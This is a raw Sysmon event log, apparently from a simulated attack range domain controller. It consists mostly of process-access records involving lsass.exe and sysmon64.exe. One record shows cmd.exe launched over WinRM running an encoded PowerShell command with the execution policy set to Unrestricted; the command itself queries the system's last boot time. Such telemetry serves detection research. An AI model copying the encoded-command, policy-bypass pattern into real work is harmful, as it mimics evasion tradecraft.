15:50:27.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.138{D28789B6-7C43-5FA1-1503-000000008701}44084264C:\Windows\system32\conhost.exe{D28789B6-7C43-5FA1-1603-000000008701}4676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C43-5FA1-1603-000000008701}4676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7C43-5FA1-1403-000000008701}44523944C:\Windows\system32\WinrsHost.exe{D28789B6-7C43-5FA1-1603-000000008701}4676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.134{D28789B6-7C43-5FA1-1603-000000008701}4676C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C43-5FA1-7F57-110000000000}0x11577f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.122{D28789B6-7AD2-5FA1-1400-000000008701}13681468C:\Windows\system32\svchost.exe{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.106{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.106{D28789B6-7C43-5FA1-1503-000000008701}44084264C:\Windows\system32\conhost.exe{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C43-5FA1-1503-000000008701}4408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 